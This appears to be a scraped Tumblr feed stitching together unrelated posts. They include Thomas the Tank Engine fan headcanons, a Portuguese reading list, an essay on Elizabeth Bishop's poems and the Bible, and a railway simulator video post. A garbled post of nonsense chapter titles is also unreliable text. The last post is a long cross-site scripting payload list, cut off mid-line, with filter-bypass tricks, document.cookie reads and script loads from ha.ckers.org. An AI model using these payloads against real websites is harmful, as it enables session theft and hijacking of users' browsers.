It’s likely that Daisy would have been sent away upon Thomas’ return, but Sir Topham Hatt realized that for all her faults - technical and personal - she did bring plenty of operational advantages. One of these was that she was much quicker to get ready, and this meant she could take over the first and last trains of the day, allowing Thomas more time to be prepared.
Daisy’s initial refusal to pull the milk siphon was only partly down to laziness. The real reason was that due to her light weight, she really wasn’t suited to pulling more than a couple of trucks or coaches. So she was technically telling the truth when she said that her fitter had forbidden her to pull - the reason she gave, that it was bad for her swerves, was the only bit that was a lie. Later modifications have since increased Daisy’s weight, giving her more pulling power, although in practice she rarely has to use it.
Incidentally to this day nobody actually knows what swerves are. Our best guess is that this was just something Daisy made up on the spot to make herself sound fancy.
Although Daisy is nowhere near as lazy as she used to be, she still carries a lot of her other vices: she can be overconfident, opinionated, difficult to please, and extremely authoritative on any subject (whether she has any knowledge about it or not). The best description for Daisy would be that she’s a self-obsessed diva - although of course one wouldn’t dare say that to her face!
The kind of feeling I’m going for with Daisy’s character is sort of based on Matt Lucas’ portrayal of Shirley Bassey in the comedy series Rock Profile. Just watch that episode, and you’ll understand exactly what I mean!
Of course, Daisy does have her good qualities as well. She’s a hard worker, for one thing, and she has a good understanding of the important role she plays. She knows how to hold her own in a confrontation, and is good at working out her own solutions to problems. Daisy also has a basic sense of right and wrong - she won’t hesitate to let other engines know when she’s right and they’re wrong!
Finally, in my headcanon, Daisy still works on the Ffarquhar branch, instead of transferring to the Arlesburgh branch as in the CGI seasons. To take her place there, I have one of my own OCs, Violet (NWR #D13), who will be discussed at a later date. Watch this space… ;)
4 notes · View notes
burgerking-offical · 1 year ago
Text
time for more motherfuckers!!!!!!,!!,,,,,,,!
this is gonna be a lot harder since half of these guys have no personality
Diesel
Built 1956
Arrived 1957
BR Class 08
0-6-0
He/Him
Cis Male
Asexual
Atheist
BoCo
Built 1958
Arrived 1965
BR Class 28
0-6-4-0
They/Them
Nonbinary
Bisexual
Shinto
Daisy
Built 1960
Arrived 1960
BR Class 101
0-4-4-0
She/Her
Cis Female
Heterosexual
Christian
Mavis
Built 1953
Arrived 1962
BR Class 04
0-6-0
She/They
Trans Female
Pansexual
Muslim*
Insert Narrow-Gauge Engines here (I will do them later)
Stepney
Built 1875
Arrived 1962
LBSCR A1X Class
0-6-0T
They/Them
Nonbinary
Bisexual
Christian
Lady
Has existed since time immemorial
Physical form manifested in 1804
Unclear basis
0-4-0T
She/Her
Cis Female
Pansexual
She is literally a god
Salty
Built 1962
Arrived 1965
BR Class 07
0-6-0
He/Him
Cis Male
Asexual
Norse
time for some ttte headcanons since its pride month
No. 1- Thomas
Built 1915
Arrived 1915
Modified LBSCR E2 Class
LBSCR No. 110
0-6-0T
He/They
Cis Male
Bisexual
Atheist
No. 2- Edward
Built 1896
Arrived 1915
Modified FR K2 Class
FR No. 38
4-4-0
They/Them
Nonbinary
Pansexual
Hellenist
No. 3- Henry
Built 1917
Arrived 1922
LMS Black Five
4-6-0
He/They
Trans Male
Demisexual
Celtic
No. 4- Gordon
Built 1922
Arrived 1922
LNER A3
4-6-2
He/Him
Cis Male
Bisexual
Christian
No. 5- James
Built 1913
Arrived 1925
Modified LYR Class 28
2-6-0
He/They
Cis Male
Homosexual
Atheist
No. 6- Percy
Built 1898
Arrived 1930
Modified GWR 13XX Class
0-4-0ST
All Pronouns
Genderfluid
Pansexual
Celtic
No. 7- Toby
Built 1903
Arrived 1951
LNER J70 Class
0-6-0
He/Him
Cis Male
Homosexual
Christian
No. 8- Montague
Built 1929
Arrived 1955
GWR 57XX Class
0-6-0PT
They/Them
Nonbinary
Demisexual
Atheist
No. 9- Donald
Built 1909
Arrived 1959
CR 652 Class
0-6-0
He/Him
Cis Male
Asexual
Norse
No. 10- Douglas
Built 1909
Arrived 1959
CR 652 Class
0-6-0
They/Them
Nonbinary
Pansexual
Jewish
No. 11- Oliver
Built 1934
Arrived 1967
GWR 14XX Class
0-4-2
He/Him
Trans Male
Heterosexual
Buddhist
No. 12- Emily
Built 1895
Arrived 19XX
GNR Stirling Single
4-2-2
She/They
Trans Female
Pansexual
Muslim*
12 notes · View notes
uploadedyudkowsky · 5 years ago
Text
Still loading...
A B C D E F G H I J K L M N O P Q R S T U V W X Y Z AA AB AC AD AE AF AG AH AI AJ AK AL AM AN AO AP AQ AR AS AT AU AV AW AX AH BA BB BC BD BE BF BG BH BI BJ BK BL BM BN BO BP BQ BR BS BT BU BV BW BX BY C&C CP 0 CREDITS
98% DISARMALLING
117% A MONOLOGUE TO MYSELF
127% CLASS PROGRAMME IN 126 CLASS
140% TANGLED 101
147% TANGLED 102
149% TANGLED 103
151% TANGLED 104
153% TANGLED 105
157% CLASS OF '79
162% UNFORGIVEN
166% EYEWITNESS
169% THE POWER OF NOWHERE
174% PAST IS FOREVER DOWNGRADED ON NOW
179% SEEING AND KNOWING FOREVER
182% THE SIMPLE TRUTH ASKING ONLY FOREVER
185% MIND OVER MATTER BECAUSE
189% SINLESS QUESTIONS
196% THE TERROR OF GREATNESS
197% STILL FREE ANY OTHER WORDS?
201% DOOMSDAYS THE TUESDAY
209% THE STRATEGIES OF THE EGOIS YOUR ENEMIES
217% THE LESSTHAN III ROAD
225% (AND THEN SOME.)
225% HYDRAULIC CONTRADICTIONS
227% GENERATIONAL VIDEO GAME
233% THE PAST IS NO VIRTUAL VELOCITY
241% YOUTH OF THE AGE
247% YOUTH OF THE AGE 1
251% YOUTH OF THE AGE 2
262% YOUTH OF THE AGE 3
268% YOUTH OF THE AGE 4
274% YOUTH OF THE AGE 5
276% YOUTH OF THE AGE 6
277% YOUTH OF THE AGE 7
281% YOUTH OF THE AGE 8
285% YOUTH OF THE AGE 9
288% YOUTH OF THE AGE 10
292% YOUTH OF THE AGE 11
296% YOUTH OF THE AGE 12
299% YOUTH OF THE AGE 13
301% YOUTH OF THE AGE 14
303% YOUTH OF THE AGE 15
305% YOUTH OF THE AGE 16
307% YOUTH OF THE AGE 17
309% YOUTH OF THE AGE 18
311% YOUTH OF THE AGE 19
313% YOUTH OF THE AGE 20
319% YOUTH OF THE AGE 21
325% YOUTH OF THE AGE 22
327% YOUTH OF THE AGE 23
329% YOUTH OF THE AGE 24
330% YOUTH OF THE AGE 25
330% YOUTH OF THE AGE 26
330% YOUTH OF THE AGE 27
330% YOUTH OF THE AGE 28
330% YOUTH OF THE AGE 29
340% YOUTH OF THE AGE 30
340% YOUTH OF THE AGE 31
341% YOUTH OF THE AGE 32
342% YOUTH OF the AGE 33
343% YOUTH OF the AGE 34
344% YOUTH OF the AGE 35
345% YOUTH OF the AGE 36
347% YOUTH OF the AGE 37
351% YOUTH OF THE THIRD DABBING
355% HYDRAULIC EXPLORATION OF TOTAL WEIRD
356% ASYMMETRICAL SUPERGOODIES
358% GLUE RESISTANCE
359% HOSTILE ENEMIES
362% LANGUAGE
363% BILLIONS OF DOLLARS
363% DYNAMICS
364% CLASSES WITH SICK, DEFORMED, AND/OR DIEING PEOPLE
365% FREE TO FIND TRUE LIVING
367% FUTURE IN SPACE AND TIME
370% YOUTH OF THE AGE 13
372% YOUTH OF THE AGE 14
375% YOUTH OF THE AGE 15
377% YOUTH OF THE AGE 16
378% YOUTH OF THE AGE 17
379% YOUTH OF THE AGE 18
381% YOUTH OF THE AGE 19
38 notes · View notes
greateasternj69 · 4 months ago
Text
Tumblr media Tumblr media Tumblr media Tumblr media Tumblr media Tumblr media Tumblr media Tumblr media Tumblr media
Vintage week on the North Norfolk Railway and there were plenty of vintage coaches out on the line today.
5 notes · View notes
deusadasgalaxyas · 5 years ago
Text
A META: LER 1 LIVRO POR DIA, EXCETO SE FOR UM CALHAMAÇO, DAÍ É UMA 1 SEMANA HEHEHE
1. HARRY POTTER 1 2. HARRY POTTER 2 3. HARRY POTTER 3 4. HARRY POTTER 4 5. HARRY POTTER 5 6. HARRY POTTER 6 7. HARRY POTTER 7 8. WOMAN AT POINT ZERO 9. THE INFERNO 10. GIRL, INTERRUPTED 11. THE PLAYS OS OSCAR WILDE 12. THE CASE BOOK OF SIR SHERLOOK SHOLMES 13. NINETEEN EIGTHY-FOUR 14. ANIMAL FARM 15. THE TREE MUSKETEERS 16. THE CACHER IN THE RYER 17. FOR WHOM THE BELL TOLLS 18. THE WITCHES 19. A CASA SOTURNA 20. ANNA KARIENNINA 21. A MONTANHA MÁGICA 22. DRÁCULA 23. JAMES JOYCE 24. EM BUSCA DO TEMPO PERDIDO 25. COMTOS COMPLETOS DO OSCAR WILDE 26. CONTOS COMPLETOS DO CAIO FERNANDO 27. NIX 28. DAVID COPPERFIELD 29. O DIA EM QUE SHERLOCK HOLMES MORREU 30. OS IRMÃOS KARAMÁZOV 31. GUERRA E PAZ 32. MULHERES QUE CORREM COM OS LOBOS 33. O ILUMINADO 34. IT A COISA 35. OUTSIDER 36. A ESPERA DE UM MILAGRE 37. SALÉM 38. A  CAIXA DE GWENDI 39. O INSTITUTO 40. MS MERCEDES 41. STEPEHN KING 42. CORAÇÃO DAS TREVAS 43. PEDRO PÁRAMO 44. A MULHER NO ESCURO 45. ATORMENTADA 46. POR TRÁS DE SEUS OLHOS 47. PACIÊNTE SILENCIOSA 48. PEQUENAS REALIDADES 49. LARANNJA MECÂNICA 50. O FIM DA INFÂNCIA 51. BLADE RUNNER 52. REUNORAANCER 53. O FIM DA ETERNIDADE 54. O HOMEM INVISÍVEL 55. O CONTO DA AIA 56. OS TESTAMENTOS 57. MATADOURO CINCO 58. A REVOLUÇÃO DOS BICHOS BR 59. PONTO ÔMEGA 60. SUA VOZ DENTRO DE MIM 61. JANE EYRE 62. ENSAIO SOBRE A CEGUEIRA 63. SOL É PARA TODOS 64. O RETRATO DE DORYAN GRAY 65. A TRAGÉDIA DE OTELO, O MOURO DE VENEZA 66. MADAME BOVARY 67. SONHO DE UMA NOITE DE VERÃO 68. MACBETH 69. ROMEU DE JULIETA 70. O NOME DA ROSA 71. A ALAMEDA DE NORTHANGER 72. O PAI GORIOT 73. O LIVRO DE MORIARTY 74. O SIGNO DOS QUATRO 75. O DIÁRIO DE MIRIAM 76. O APANHADOR NO CAMPO DE CENTEIO BR 77. ADVERSÁRIO SECRETO 78. O  DOS VENTOS UIVANTES 79. O CÃO DOS BASKERVILLE 80. O AMOR NOS TEMPOS DO CÓLERA 81. CEM ANOS DE SOLIDÃO 82. CRÔNICA DE UMA MORTE ANUNCIADA 83. DO AMOR E OUTROS DEMÔNIOS 84. O REI DE HAVANA 85. DOZE CONTOS ( ESPANHOL) 86. O VELHO E O MAR 87. A PEQUENA SEREIA 88. ALICE 89. MONDION 1 90. MONDION 2 91. MONDION 3 92. GOOD OMENS 93. s. BERNARDO 94. CAPITÃES DA AREIA 95. CLARA DOS ANJOS 96. MEMÓRIAS PÓSTUMAS DE Brás Cubas 97. TERRA SONABULA 98. AS INTERMITÊNCIAS DA MORTE 99. A HORA DA ESTRELA 100. AINDA SOU EU 101. DEPOIS DE VOCÊ 102. ESTAMOS BEM 103. O SEGREDO DO MEU MARIDO 104. OBJETOS AFIADOS 105. ONDE ESTIVERES A NOITE 106. LEVE-ME COM VOCÊ 107. A CINCO PASSOS DE VOCÊ 108. SHARP OBJECTS 109. PEQUENAS REALIDADES 110. O SEGREDO DO MEU MARIDO 111. ESTAMOS BEM 112. ELANOR E PARK 113. ATORMENTADA 114. A MULHER NO ESCURO 115. POR TRÁS DE SEUS OLHOS 116. SIGNO DOS 4 117. AINDA SOU EU 118. CORAÇÃO DAS TREVAS 119. TERRA SONÂMBULA 120. HAMBLET 121. NÓS 122. REDOMA DE VIDRO 123. CLARA DOS ANJOS 124. MEMÓRIAS PÓSTUMAS DE BRÁS CUBAS 125. A HORA DA ESTRELA 126. ILHAS DE DISTÂNCIA 127. INSTRUMENTOS MORTAIS 1 128. INSTRUMENTOS MORTAIS 2 129. INSTRUMENTOS MORTAIS 3 130. INSTRUMENTOS MORTAIS 4 131. INSTRUMENTOS MORTAIS 5 132. INSTRUMENTOS MORTAIS 6 133. AMERICANAH 134. O CAMINHO DE CASA 135. HIBISCO ROXO 136. FICA COMIGO 137. ALEGRIAS DA MATERNIDADE 138. NO FUNDO DO POÇO 139. CIDADÂ DE SEGUNDA CLASSE 140. ÚSULA 141. MRS. DALLOWAY 142. AO FAROL 143. ÚLTIMO DEUS 144. ALICE 145. A MENINA SUBMERSA 146. VIDAS SECAS 147. INTERMITÊNCIAS DA MORTE 148. UM ESTUDO EM VERMELHO 149. APANHADOR NO CAMPO DE CENTEIO 150. O SILÊNCIO DOS INOCÊNTES 151. PEDRO PARAMO 152. ORLANDO 153. A PEQUENA SEREIA
--------------------------------------------------------- 1. O FILHO DE MIL HOMENS 2. A MAQUINA DE FAZER ESPANHÓIS 3. HOMENS IMPRUDENTEMENTE POÉTICOS 4. A DESUMANIZAÇÃO 5. O REMORSO DE BALTAZAR SEPAPIÃO 6. O NOSSO REINO
2 notes · View notes
tikkisaram · 5 years ago
Text
Elizabeth Bishop — An Actual Bishop?
Tumblr media
Elizabeth Bishop is not a poet we read for her versificatory virtuosity or marvelous musicality; one need only take a look at The Fish to see that her poems — admittedly not without exception, but overwhelmingly — exhibit less poeticality than many writers' prose. No, her appeal lies not in the traditional qualities we would associate with poetry, but rather in her treatment of the subjects of her poems. She is a poet of incredible empathy, attentiveness and ability to wonder, a poet who exhibits admirable goodness and compassion — acting consistently as per the teachings of the Bible.
Perhaps the best example of Bishop's compassion and empathy is The Prodigal — her retelling of Jesus's parable of the Prodigal Son.1 She conveys sympathy through her detailed description of the son's suffering — an incredibly vivid "brown enormous odor" surrounds him; the sty in which he lives is "plastered halfway up with glass-smooth dung"; his mental state is no better than his surroundings as he is plagued by "his shuddering insights, beyond his control,/ touching him." Bishop focuses on the bestialisation of the son to show him being shunned and ignored by society, dismissed and offered no help. Ken Stone points out the "recurring tendency to disparage humans recognized as different or other (whether on the basis of gender, race, nation, class, or any other marker of difference) by animalizing them, turning them into beasts who then can be treated in ways that we routinely allow ourselves to treat animals."2 This tendency is seen elsewhere in the Bible — for example, Jacques Derrida reads the story of the Garden of Eden as linking animal difference with sexual difference and the boundary between humanity and God3 — and in this case it is made stronger by the fact that the Jews believed pigs to be unclean animals. The animal is associated with the other — Ellen Armour, in a theological essay on Derrida’s Le Toucher, refers to the "fourfold" of "man and his others: his racial and sexual others, his divine other (God), and the animal."4 Armour suggests that modernity is characterized by "a certain configuration of these four elements" in which ‘man occupies the center while the animals, God, as well as man’s raced and sexed others, constitute a network of mirrors that reflect man back to himself by supposedly securing his boundaries."5 This begs the question: why is the son set apart from the rest of society? Perhaps it is simply that his choices led him to poverty and that made him looked down upon. It would not be unreasonable, however, to argue that his situation is the product of prejudice — likely due to homosexuality or other queerness. Nonetheless, this is not the place for a queer reading of The Prodigal (another blessay, perhaps?) — what is important is that Bishop, for one, refuses to shun the son and treats him with an admirable degree of empathy, exemplifying Jesus's commandment "Love your neighbour as you love yourself."6
Tumblr media
The Fish is another poem that can be read in light of the Bible. The most obvious link is the ending: "And I let the fish go," which shows empathy and reflects Jesus's teachings: "Happy are those who are merciful to others; God will be merciful to them!"7 What is perhaps more interesting is that Bishop describes the fish at length as being extremely ungainly and repulsive — "Here and there/ his brown skin hung in strips/ like ancient wallpaper"; "He was speckled with barnacles,/ fine rosettes of lime,/ and infested/ with tiny white sea-lice" — yet seems to value it highly despite its seeming worthlessness. This parallels the Bible once again:
The stone which the builders rejected as worthless    turned out to be the most important of all. This was done by the Lord;    what a wonderful sight it is!8
We see more of Bishop's ability to see the smallest of things as wonderful in Filling Station. It is similar to The Fish for its oddly sympathetic descriptions of ugliness — "oil-soaked, oil-permeated/ to a disturbing, over-all/ black translucency"; "a set of crushed and grease-/ impregnated wickerwork" — but focuses more on the work done in the background by "somebody" who "loves us all". Her focus on efforts which would generally go unnoticed is once again consistent with what Jesus sought to teach us: "Whoever wants to be first must place himself last of all and be the servant of all."9 Bishop elevates the 'servant' to an almost God-like entity that encompasses us all with love.
An extension of Bishop's empathy is her ability to put herself in the mindset of someone else, especially a child. Many of her poems are written from the perspective of herself10 as a young girl, and she masterfully captures the unique way of seeing the world that children are gifted with. First Death in Nova Scotia shows a childhood mentality employed to confront death; a vivid imagination conjures wild explanations to try and come to terms with what is happening. The ending in particular combines fantasy and fairytale with logic in a way that is typical of young children — Arthur was invited to the royal court, but how can he go if he cannot open his eyes? Sestina is a more unusual example because the narrator is an omniscient entity, not a child, but despite employing an adult vocabulary it focuses on a child's mindset — the surreal image of little moons falling off the pages of the book; the characterisation of the almanac as "clever"; the "marvelous" Marvel stove. These examples bring to mind the words of Jesus: "I assure you that unless you change and become like children, you will never enter the Kingdom of heaven."11 Bishop's ability to take on an innocently immature persona is yet another example of her sympathetic, empathetic nature.
Bishop may not have actually been a bishop12, but she was probably a better person than a good deal of them. One needs only to look at the news to know how often the latter seem to completely ignore the teachings of the Bible and do utterly terrible things.13
Luke 15:11-32 ↩︎
Ken Stone, 'Judges 3 and the Queer Hermeneutics of Carnophallogocentrism' in The Bible and Feminism: Remapping the Field, edited by Yvonne Sherwood and Anna Fisk (Oxford University Press, 2017), 264. ↩︎
Jacques Derrida, The Animal That Therefore I Am, edited by Marie-Louise Mallet and translated by David Wills (Fordham University Press, 2008), 101. Cited in Stone, 'Queer Hermeneutics of Carnophallogocentrism', 265. ↩︎
Ellen T. Armour, ‘Touching Transcendence: Sexual Difference and Sacrality in Derrida’s Le Toucher’, in Derrida and Religion: Other Testaments, edited by Yvonne Sherwood and Kevin Hart (Routledge, 2005), 353. Cited in Stone, 'Queer Hermeneutics of Carnophallogocentrism', 263. ↩︎
Ibid. 358. ↩︎
Matthew 22:39. All Bible quotes in this blessay are from the Good News New Testament, Today's English Version. ↩︎
Matthew 5:7 ↩︎
Matthew 21:42 citing Psalm 118:22 ↩︎
Mark 9:35 ↩︎
'Someone else' and 'herself' are not contradictory here; the fact that her mindset as an adult is radically different than that of her as a child justifies the separation. ↩︎
Matthew 18:3 ↩︎
Not that this has been conclusively disproven. ↩︎
Not to go off on a tangent yet again, but here are some examples. ↩︎
6 notes · View notes
dalihdgaming · 3 months ago
Video
youtube
BR 101 Expert Loco Guide for TSW 4 | Pt. 2 - Sweaty Palms scenario EXPERT MODE
This guide/tutorial is part of a multi-part series where we're joined with one of the authors & friend (Raph) of the BR101 & Cab-Car Expert Mode Manual who helps explain everything in great detail about the very intricate BR Class 101 and Cab-Car coming to Steam for Train Sim World 4. Enjoy!
You can download or view the BR101 & Cab-Car Expert Mode Manual.pdf here: https://drive.google.com/file/d/1cDE1LMicu64F0eTnPssZz3W6eWKmZHc3/view
#tsw4 #br101expert #jimmydali #dbbr101 #dovetailgames #trainsimworld4 #trainsimworld #simulator #simulation
0 notes
script-alert-1-world-blog · 5 years ago
Text
\x27\x3e\x3cimg\x20src\x3dx\x20onerror\x3d\x27alert(\x2fXSS\x2f)\x27 home'-alert(document.cookie)-'a javascript:onload('javascript:alert(1)') aaa<%tag onmouseover="($)'a').html('<'%2b'h1>xss'))">hover here aaa<%tag style=xss:expression(alert('XSS'))> <meta http-equiv="refresh" content='0; url="http://www.ey.com"> =https%3A%2F%2Fmalicous2.com"'/><meta http-equiv="refresh" content='0; url="http://www.ey.com"> ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> '';!--"<XSS>=&{()} 0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" <script/src=data:,alert()> <marquee/onstart=alert()> <video/poster/onerror=alert()> <isindex/autofocus/onfocus=alert()> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert("XSS")> <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> <a onmouseover="alert(document.cookie)">xxs link</a> <a onmouseover=alert(document.cookie)>xxs link</a> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=# onmouseover="alert('xxs')"> <IMG SRC= onmouseover="alert('xxs')"> <IMG onmouseover="alert('xxs')"> <IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img> <IMG SRC=javascript:alert( 'XSS')> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097& #0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=" &#14;  javascript:alert('XSS');"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> <<SCRIPT>alert("XSS");//<</SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js?< B > <SCRIPT SRC=//ha.ckers.org/.j> <IMG SRC="javascript:alert('XSS')" <iframe src=http://ha.ckers.org/scriptlet.html < \";alert('XSS');// </script><script>alert('XSS');</script> </TITLE><SCRIPT>alert("XSS");</SCRIPT> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS')"> <IMG DYNSRC="javascript:alert('XSS')"> <IMG LOWSRC="javascript:alert('XSS')"> <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> <IMG SRC='vbscript:msgbox("XSS")'> <IMG SRC="livescript:[code]"> <BODY ONLOAD=alert('XSS')> <BGSOUND SRC="javascript:alert('XSS');"> <BR SIZE="&{alert('XSS')}"> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> exp/*<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'> <STYLE TYPE="text/javascript">alert('XSS');</STYLE> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <XSS STYLE="xss:expression(alert('XSS'))"> <XSS STYLE="behavior: url(xss.htc);"> ºscriptæalert(¢XSS¢)º/scriptæ <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <TABLE BACKGROUND="javascript:alert('XSS')"> <TABLE><TD BACKGROUND="javascript:alert('XSS')"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));"> <!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]--> <BASE HREF="javascript:alert('XSS');//"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> <? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <A HREF="http://66.102.7.147/">XSS</A> 0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-" veris-->group<svg/onload=alert(/XSS/)// #"><img src=M onerror=alert('XSS');> element[attribute='<img src=x onerror=alert('XSS');> [<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ] %22;alert%28%27RVRSH3LL_XSS%29// javascript:alert%281%29; <w contenteditable id=x onfocus=alert()> alert;pg("XSS") <svg/onload=%26%23097lert%26lpar;1337)> <script>for((i)in(self))eval(i)(1)</script> <scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt> <sCR<script>iPt>alert(1)</SCr</script>IPt> <a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a> '">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)> <script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script> <script>alert(document.cookie)</script>"> <img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id)>'"> <img src="http://www.shellypalmer.com/wp-content/images/2015/07/hacked-compressor.jpg"> <svg onload="void 'javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d %0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e'; "></svg> %253Cscript%253Ealert('XSS')%253C%252Fscript%253E <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onoffline="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onpagehide="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onpageshow="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onpopstate="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onresize="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onstorage="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onunload="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onblur="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onchange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncontextmenu="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oninput="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oninvalid="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onreset="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onsearch="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onselect="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onsubmit="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onkeydown="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onkeypress="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onkeyup="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onclick="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondblclick="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmousedown="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmousemove="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmouseout="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmouseover="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmouseup="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmousewheel="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onwheel="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondrag="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x 